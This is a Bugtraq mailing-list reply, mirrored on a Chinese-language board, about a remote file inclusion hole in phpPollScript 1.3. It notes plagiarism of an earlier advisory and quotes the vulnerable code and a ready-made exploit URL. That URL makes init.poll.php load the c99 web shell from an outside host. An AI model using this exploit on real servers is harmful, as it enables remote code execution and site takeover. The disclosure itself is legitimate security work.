Re: phpPollScript - 1.3 Remote File Include

看板Bugtraq作者bugtraq.時間16年前 (2009/12/23 02:01)推噓0(0推 0噓 0→)

留言0則, 0人參與討論串2/2 (看更多)

stolen/copied. http://packetstormsecurity.org/0909-exploits/phppollscript-rfi.txt 67daecae41e8707794f089bf6128efd0 phpPollScript versions 1.3 and below suffer from a remote file inclusion vulnerability. Authored By <a href="mailto:cr4wl3r[at]linuxmail.org">cr4wl3r</a> On Sun, Dec 20, 2009 at 11:43:25AM -0000, admin@ekin0x.com wrote: > #phpPollScript <= 1.3 Remote File Include Vulnerability > #Download Script : http://download.tomex.org/phpPollScriptv13b.zip > #Author : ZZxxHackerzzXX > #Contact : admin@ekin0x.com > #Location : Turkey > ######################################################################## > #file : > # init.poll.php > # line 2 $inc_path = dirname($include_class); > # line 3 require ($inc_path."/voting.poll.php"); > ######################################################################## > #3xplo!t : > #http://target.com/[path]/php/init.poll.php?include_class=http://www.ekin0x.com/c99.txt? > ######################################################################## > #eser@ekin0x.com (all crew shell) > ########################################################################

‣ 返回看板[ Bugtraq ] 臭蟲

‣ 更多 bugtraq. 的文章

文章代碼(AID): #1BCGbahz (Bugtraq)

討論串 (同標題文章)

完整討論串 (本文為第 2 之 2 篇)：

排序：最新先 | 最舊先 | 留言數

Re: phpPollScript - 1.3 Remote File Include Re: phpPollScript - 1.3 Remote File Include

bugtraq.

16年前, 12/23

phpPollScript - 1.3 Remote File Include phpPollScript - 1.3 Remote File Include

16年前, 12/22

文章代碼(AID): #1BCGbahz (Bugtraq)